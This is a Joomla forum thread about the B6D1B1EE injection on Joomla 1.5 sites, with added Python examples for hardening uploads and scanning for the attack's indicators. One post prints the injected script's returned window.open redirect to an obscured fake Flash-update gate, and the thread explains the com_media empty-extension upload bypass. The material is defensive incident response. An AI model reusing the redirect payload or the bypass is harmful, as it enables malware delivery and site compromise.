- Location: UK
- Contact:
Re: ";} /*B6D1B1EE*/ ?> at top of site
I have been looking into this issue on behalf of the VEL since this morning. It seems that the actual script injected doesn't do anything dangerous, either because the attacker was not very competent, or maybe just wanted a proof of concept. That is just our good luck; we should definitely be very worried about this. From the number of sites affected it is obvious that this is an automated attack, and therefore it seems it could easily be replicated, except with some real malware next time.
It seems that the attack involves adding a PHP file to mod_stats. I have checked the module, and I cannot find any obvious weakness in it; it is most likely that it is just a convenient place to try to hide a file and nothing to do with the module itself.
I think that by far the most likely way that this attack is accomplished is through the known vulnerability in com_media which was discovered back in 2013, which uses an empty file extension to bypass the normal file checks.
So how to protect against the attack?
The preferred option is to update your site to the latest Joomla, 3.6.2; it is much more secure. However it is quite a complex migration path from 1.5 to 3.6, and inevitably takes time. It seems to me that there are some basic security hardening steps that you can take that should offer some protection against the com_media hack in the meantime.
1. Update your site to the latest version of 1.5, that is 1.5.26; unless someone has been hacking the core code, that ought to be possible;
2. apply the file upload vulnerability patch, it is available here at the bottom of the page: http://joomlacode.org/gf/project/joomla ... m_id=31626
3. in the Joomla configuration, make sure that user registration is disabled; unfortunately by default in J1.5 anyone can create an active account on your site unless you disallow it; unless of course this is impossible, for example on an e-commerce store;
4. in the com_media options, make sure that the Restrict Uploads option is set to "YES";
5. also in the com_media options, set Check Mime Type to "NO"; this may seem counterintuitive, but what this does is restrict uploads of non-image files to administrators only.
To explain why I am suggesting these steps:
The basic problem is weak ACL in com_media in Joomla 1.5: any registered user can access the file controller upload task, and anyone by default can register themselves as a user. Then whether a file can be uploaded depends only on the canUpload() test in com_media/helpers/media.php, and it is that test that the empty file extension vulnerability managed to exploit.
The Mime Check option matters because as a test it is very weak, in fact completely useless as far as security is concerned: a PHP file would pass it, so it is much better to turn it off and instead restrict uploads to those with admin login privileges (managers, administrators and super users).
Still it is far better to migrate your site to Joomla 3, even if you manage to patch all the security issues in the Joomla Core you will still probably have extensions that contain vulnerabilities.
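The upload rules fcoulter lays out above (reject anything without a proper single extension, do not trust the client's MIME type, and let only back-end groups upload non-image files), worked through as an added Python example. This is illustrative code written for this thread, not Joomla's com_media helper and not anything fcoulter posted: the group names are the Joomla 1.5 back-end groups, the extension lists and the magic-byte table are my own choices, and the Upload and Decision types are constructed for the example.

```python
"""Hardened upload policy in the spirit of the com_media advice in this thread.

Added example, not Joomla's own code.  It rejects names with no extension or a
trailing dot (the empty-extension case), rejects double extensions, never
accepts server-executable extensions, checks image content by magic bytes
instead of the browser's Content-Type, and lets only back-end groups upload
non-image files (the effect of Restrict Uploads = Yes).
"""
from dataclasses import dataclass

# Joomla 1.5 back-end group names; anyone else is treated as a front-end user.
ADMIN_GROUPS = {"Manager", "Administrator", "Super Administrator"}
IMAGE_EXTENSIONS = {"gif", "jpg", "jpeg", "png", "bmp"}
DOCUMENT_EXTENSIONS = {"pdf", "txt", "doc", "xls", "odt", "ods"}
# Never accepted, whoever uploads them (my own list, not Joomla's).
EXECUTABLE_EXTENSIONS = {"php", "php3", "php4", "php5", "phtml", "phar", "htaccess", "cgi", "pl"}

# Leading bytes each accepted image type must start with; a "<?php" file matches none.
IMAGE_MAGIC = {
    "gif": [b"GIF87a", b"GIF89a"],
    "jpg": [b"\xff\xd8\xff"],
    "jpeg": [b"\xff\xd8\xff"],
    "png": [b"\x89PNG\r\n\x1a\n"],
    "bmp": [b"BM"],
}


@dataclass
class Upload:
    filename: str
    content: bytes
    client_mime: str  # what the browser claimed; deliberately never consulted below


@dataclass
class Decision:
    allowed: bool
    reason: str


def split_extension(filename):
    """Return (base name, list of lower-cased dot-separated suffixes)."""
    name = filename.rsplit("/", 1)[-1].rsplit("\\", 1)[-1]
    parts = name.split(".")
    return parts[0], [p.lower() for p in parts[1:]]


def can_upload(upload, user_groups, restrict_uploads=True):
    """Decide whether an upload is accepted; mirrors the thread's hardening advice."""
    base, exts = split_extension(upload.filename)
    # Empty extension (no dot, or a trailing dot) and dot-files like ".htaccess"
    # have nothing sensible to check against, so they are refused outright.
    if base == "" or not exts or exts[-1] == "":
        return Decision(False, "missing file name or extension")
    # Double extensions are refused rather than guessed at.
    if len(exts) > 1:
        return Decision(False, "multiple extensions")
    ext = exts[0]
    if ext in EXECUTABLE_EXTENSIONS:
        return Decision(False, "executable extension")
    if ext in IMAGE_EXTENSIONS:
        # Check the bytes, not the client-supplied MIME type.
        if not any(upload.content.startswith(m) for m in IMAGE_MAGIC[ext]):
            return Decision(False, "content does not match image type")
        return Decision(True, "image")
    if ext in DOCUMENT_EXTENSIONS:
        # Non-image uploads are an admin-only privilege when Restrict Uploads is on.
        if restrict_uploads and not (set(user_groups) & ADMIN_GROUPS):
            return Decision(False, "non-image upload requires admin group")
        return Decision(True, "document")
    return Decision(False, "extension not in allow-list")


if __name__ == "__main__":
    # Constructed sample uploads.
    for up, groups in [
        (Upload("photo.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 8, "image/png"), ["Registered"]),
        (Upload("shell.", b"<?php", "image/gif"), ["Registered"]),
        (Upload("fake.gif", b"<?php echo 1;", "image/gif"), ["Registered"]),
        (Upload("notes.pdf", b"%PDF-1.4", "application/pdf"), ["Super Administrator"]),
    ]:
        print(up.filename, groups, can_upload(up, groups))
```

Magic-byte sniffing only catches files that do not start with valid image bytes, so the real protection behind these rules is the group restriction fcoulter recommends, plus a web server that never executes anything from the upload directory; treat the content check as a filter, not a guarantee.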
- fcoulter
- Joomla! Ace
- Posts: 1685
- Joined: Thu Sep 13, 2007 11:39 am
- Location: UK
- Contact:
Re: ";} /*B6D1B1EE*/ ?> at top of site
Actually I did some more testing, and it seems that the script injected into mod_stats may not be so harmless.
It seems to try to get information about the time zone and screen dimensions and then load itself again with that information supplied in the URL.
If you load the URL http://*********.net/js/analytic.php?id=4&tz=60&rs=800x600, i.e. with a time zone and screen dimensions, then it actually returns this JavaScript:
Code:
window.open('http://************.com/update/gate.php?hash=096dc88a4cd59b79ba66d2f6e5cec427', '_self');
That URL, which I have obscured, is a fake Adobe update site; it is most likely trying to produce a fake Flash update notice to trick users into downloading malware. If it is not working then that is just good luck on our part.
-
- Joomla! Fledgling
- Posts: 1
- Joined: Fri Sep 02, 2016 8:02 am
Re: ";} /*B6D1B1EE*/ ?> at top of site
Hi guys,
I have been affected by this injection as well, and it seems that in some way JavaScript files and PHP files were created. At the beginning I reacted as you did; however, I realised that the website is sending emails constantly to all clients and employees.
Has anyone found a solution for it?
My FPA follows:
Problem Description :: Forum Post Assistant (v1.2.7) : 2nd September 2016 wrote:
Suddenly my website starts to send email to every one of my clients and even the employees.
Forum Post Assistant (v1.2.7) : 2nd September 2016 wrote:
Basic Environment ::
Joomla! Instance :: Joomla! 1.5.26-Stable (senu takaa ama busani) 27-March-2012
Joomla! Configured :: Yes | Writable (755) | Owner: fosseway (uid: 1/gid: 1) | Group: fosseway (gid: 1) | Valid For: 1.5
Configuration Options :: Offline: 0 | SEF: 0 | SEF Suffix: 0 | SEF ReWrite: 0 | .htaccess/web.config: Yes | GZip: 1 | Cache: 0 | FTP Layer: 0 | SSL: 0 | Error Reporting: 0 | Site Debug: 0 | Language Debug: 0 | Database Credentials Present: Yes
Host Configuration :: OS: Linux | OS Version: 2.6.32-504.12.2.el6.x86_64 | Technology: x86_64 | Web Server: Apache | Encoding: gzip, deflate | Doc Root: /home/fosseway/public_html | System TMP Writable: Yes
PHP Configuration :: Version: 5.4.44 | PHP API: cgi-fcgi | Session Path Writable: No | Display Errors: 1 | Error Reporting: 22519 | Log Errors To: | Last Known Error: | Register Globals: | Magic Quotes: | Safe Mode: | Open Base: | Uploads: 1 | Max. Upload Size: 2M | Max. POST Size: 8M | Max. Input Time: -1 | Max. Execution Time: 30 | Memory Limit: 128M
MySQL Configuration :: Version: 5.6.31 (Client:mysqlnd 5.0.10 - 20111026 - $Id: c85105d7c6f7d70d609bb4c000257868a40840ab $) | Host: --protected-- (--protected--) | Collation: latin1_swedish_ci (Character Set: latin1) | Database Size: 49.00 MiB | #of Tables: 119
Detailed Environment ::
PHP Extensions :: Core (5.4.44) | date (5.4.44) | ereg () | libxml () | openssl () | pcre () | sqlite3 (0.7) | zlib (2.0) | bcmath () | calendar () | ctype () | curl () | dom (20031129) | fileinfo (1.0.5) | filter (0.11.0) | ftp () | gd () | hash (1.0) | iconv () | SPL (0.2) | json (1.2.1) | mbstring () | mcrypt () | session () | standard (5.4.44) | mysqlnd (mysqlnd 5.0.10 - 20111026 - $Id: c85105d7c6f7d70d609bb4c000257868a40840ab $) | mysqli (0.1) | Phar (2.0.1) | posix () | Reflection ($Id: f6367cdb4e3f392af4a6d441a6641de87c2e50c4 $) | mysql (1.0) | SimpleXML (0.1) | soap () | sockets () | imap () | tokenizer (0.1) | xml () | xmlreader (0.1) | xmlwriter (0.1) | xsl (0.1) | zip (1.11.0) | cgi-fcgi () | Zend Engine (2.4.0) |
Potential Missing Extensions :: suhosin |
Switch User Environment (Experimental) :: PHP CGI: Yes | Server SU: Yes | PHP SU: Yes | Custom SU (LiteSpeed/Cloud/Grid): Yes
Potential Ownership Issues: No
Folder Permissions ::
Core Folders :: images/ (755) | components/ (755) | modules/ (755) | plugins/ (755) | language/ (755) | templates/ (755) | cache/ (755) | logs/ (755) | tmp/ (755) | administrator/components/ (755) | administrator/modules/ (755) | administrator/language/ (755) | administrator/templates/ (755) |
Elevated Permissions (First 10) ::
Extensions Discovered ::
Components :: SITE :: User (1.5.0) | MailTo (1.5.0) | default (1.0.0) | Wrapper (1.5.0) | Froogle (1.0.0) |
Components :: ADMIN :: Template Manager (1.5.0) | Weblinks (1.5.0) | Polls (1.5.0) | Language Manager (1.5.0) | Smart Former (2.4.0) | Control Panel (1.5.0) | VirtueMart (1.1.4) | sh404sef (2.0.1.531) | sh404sef - System mobile templ (1.0.0.531) | sh404sef - System plugin (2.0.1.531) | J16 Language backport - system (1.0.0.531) | sh404sef - Similar urls plugin (2.0.1.531) | Newsfeeds (1.5.0) | User Manager (1.5.0) | swMenuPro (6.5) | Banners (1.5.0) | Mass Mail (1.5.0) | Media Manager (1.5.0) | Cache Manager (1.5.0) | Instantsearch (1) | Content Page (1.5.0) | Search (1.5.0) | Messaging (1.5.0) | Module Manager (1.5.0) | Configuration Manager (1.5.0) | Plugin Manager (1.5.0) | JoomlaPack (2.1) | Froogle (1.0.0) | Frontpage (1.5.0) | Trash (1.0.0) | Installation Manager (1.5.0) | Contact Items (1.0.0) | Menus Manager (1.5.0) |
Modules :: SITE :: Poll (1.5.0) | VirtueMart Currency Selector (1.1.0) | Related Items (1.0.0) | Who\'s Online (1.0.0) | Custom HTML (1.5.0) | Random Image (1.5.0) | VirtueMart Search (1.1.0) | VirtueMart Random Products (1.1.0) | Sections (1.5.0) | VirtueMart Featured Products (1.1.0) | Archived Content (1.5.0) | Extended Menu (1.0.6 (build ) | SmartFormer (1.5.0) | swMenuPro (6.5) | Search (1.0.0) | Random Products (1.5.0) | VirtueMart Shopping Cart (1.1.0) | VirtueMart Login (1.1.4) | Statistics (1.5.0) | Latest News (1.5.0) | Menu (1.5.0) | VirtueMart Product Categories (1.1.0) | Wrapper (1.0.0) | VirtueMart Module (1.1.4) | VirtueMart Manufacturers (1.1.0) | VirtueMart Top Ten Products (1.1.0) | VirtueMart Latest Products (1.1.0) | Syndicate (1.5.0) | Footer (1.5.0) | Most Read Content (1.5.0) | Newsflash (1.5.0) | Feed Display (1.5.0) | Banner (1.5.0) | VirtueMart Product Scroller (1.1.0) | Breadcrumbs (1.5.0) | Login (1.5.0) |
Modules :: ADMIN :: Latest News (1.0.0) | Title (1.0.0) | Custom HTML (1.5.0) | Popular Items (1.0.0) | User Status (1.5.0) | Admin Submenu (1.0.0) | Logged in Users (1.0.0) | Items Stats (1.0.0) | Online Users (1.0.0) | Footer (1.0.0) | Unread Items (1.0.0) | Feed Display (1.5.0) | Admin Menu (1.0.0) | Toolbar (1.0.0) | Quick Icons (1.0.0) | Login Form (1.0.0) |
Plugins :: SITE :: Button - Image (1.0.0) | Button - Pagebreak (1.5) | Button - Readmore (1.5) | Search - Content (1.5) | Search - Contacts (1.5) | Search - Weblinks (1.5) | Search - Newsfeeds (1.5) | Search - Categories (1.5) | Search - Sections (1.5) | Virtuemart Extended Search Plu (1.5) | System - LazyDbBackup (1.5.4b) | System - SEF (1.5) | System - Cache (1.5) | System - Mootools Upgrade (1.5) | System - Log (1.5) | System - Backlinks (1.5) | System - Remember Me (1.5) | sh404sef - System mobile templ (1.0.0.531) | Azrul System Mambot For Joomla (2.7) | System - Google Analytics Trac (1.2.3) | sh404sef - System plugin (2.0.1.531) | System - Legacy (1.5) | System - Debug (1.5) | J16 Language backport - system (1.0.0.531) | User - Joomla! (1.5) | User - Example (1.0) | Editor - XStandard Lite for Jo (1.0) | Image Manager (1.5.2) | SpellChecker (2.0.0) | Object Support (1.5.1) | Paste (1.5.3) | File Browser (1.5.0 Stable) | Paste (1.5.0) | Advanced Code Editor (1.5.3) | Joomla! Links for Advanced Lin (1.2.1) | Advanced Link (1.5.1) | Editor - JCE 154 (154) | Editor - TinyMCE 3 (3.2.6) | XML-RPC - Joomla API (1.0) | XML-RPC - Blogger API (1.0) | sh404sef - Similar urls plugin (2.0.1.531) | Authentication - Joomla (1.5) | Authentication - Example (1.5) | Authentication - OpenID (1.5) | Authentication - LDAP (1.5) | Authentication - GMail (1.5) | VirtueMart Product Snapshot (1.1.0) | Content - Example (1.0) | Content - Smart Former 2.4 (1.5) | Content - Vote (1.5) | Content - Pagebreak (1.5) | Content - Email Cloaking (1.5) | Azrul Videobot (0.1) | Content - Code Highlighter (Ge (1.5) | Content - Page Navigation (1.5) | Content - Load Modules (1.5) |
Templates Discovered ::
Templates :: SITE :: Fosseway (1.0) | Fosseway (1.0) | jTemplate (1.0.3) | beez (1.0.0) | JA_Purity (1.2.0) | rhuk_milkyway (1.0.2) |
Templates :: ADMIN :: Khepri (1.0) |
-
- Joomla! Fledgling
- Posts: 3
- Joined: Wed Aug 31, 2016 11:02 am
Re: ";} /*B6D1B1EE*/ ?> at top of site
The same for me.
rogeriovaz wrote:
Hi guys,
I have been affected by this injection as well, and it seems that in some way JavaScript files and PHP files were created. At the beginning I reacted as you did; however, I realised that the website is sending emails constantly to all clients and employees.
Has anyone found a solution for it?
My FPA follows:
The attacker was using an HTTP POST to /libraries/phpxmlrpc/compat/article48.php to send spam mail.
They also changed the modified date of article48.php so that it wasn't obvious.
Also got some spam email from this forum as soon as I registered.
While I work out what to do I'm using a static rip of the Joomla site.
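A triage script for the indicators reported across this thread, offered as an added example that is not from any poster here or from Joomla: the B6D1B1EE marker injected into the template, PHP files dropped under modules/mod_stats (written as mod_stat in one post, so the prefix matches both) and tmp, the back-dated article48.php from the post above, and the spam-relay POSTs visible in the access log. The path prefixes and the relay path come from the thread; the ctime-versus-mtime heuristic is my own, and the sample log lines are constructed with documentation-range IPs.

```python
"""Indicator triage for the B6D1B1EE injection discussed in this thread.

Added example, not a Joomla or forum tool.  scan_tree() walks a site root and
flags the template marker, PHP files in the drop locations the thread names,
and files whose inode change time is far ahead of their modification time;
relay_posts() pulls POSTs to the spam relay script out of Apache access-log
lines.
"""
import os
import re

MARKER = b"/*B6D1B1EE*/"                      # the string seen at the top of affected sites
DROP_PREFIXES = ("modules/mod_stat", "tmp/")   # statXXX.php under mod_stats and the two /tmp files
RELAY_PATH = "/libraries/phpxmlrpc/compat/article48.php"

# Apache combined log format, enough fields to get IP, time, method, path and status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def scan_tree(root, stomp_gap=3600):
    """Return a list of (relative_path, reason) findings under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            try:
                with open(full, "rb") as fh:
                    data = fh.read()
                st = os.stat(full)
            except OSError:
                continue
            if MARKER in data:
                findings.append((rel, "contains B6D1B1EE marker"))
            if rel.endswith(".php") and rel.startswith(DROP_PREFIXES):
                findings.append((rel, "php file in known drop location"))
            # touch/utime can rewrite mtime, but on Linux the kernel sets ctime to
            # "now" on any inode change, so a ctime far past mtime means the
            # timestamp was altered after the last genuine write.
            if st.st_ctime - st.st_mtime > stomp_gap:
                findings.append((rel, "ctime later than mtime: possible back-dating"))
    return findings


def relay_posts(log_lines):
    """Return (ip, timestamp, status) for every POST to the relay path."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if m and m["method"] == "POST" and m["path"].split("?")[0] == RELAY_PATH:
            hits.append((m["ip"], m["ts"], int(m["status"])))
    return hits


# Constructed sample log lines; 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [31/Aug/2016:10:12:01 +0000] "POST /libraries/phpxmlrpc/compat/article48.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [31/Aug/2016:10:12:05 +0000] "GET /index.php?option=com_content HTTP/1.1" 200 8192 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [31/Aug/2016:10:13:44 +0000] "POST /libraries/phpxmlrpc/compat/article48.php?x=1 HTTP/1.1" 404 209 "-" "python-requests/2.9"',
]

if __name__ == "__main__":
    for ip, ts, status in relay_posts(SAMPLE_LOG):
        print(f"relay POST from {ip} at {ts} -> HTTP {status}")
    for rel, reason in scan_tree("."):
        print(f"{rel}: {reason}")
```

The timestamp heuristic is a filter, not proof: a restore that preserves modification times (cp -p, rsync -a) will trip it on every file, so run it against the live tree before restoring, and use the marker and drop-location hits to decide what to inspect first. A 404 in the relay output, as in the third sample line, is the pattern the poster above saw once Joomla was removed.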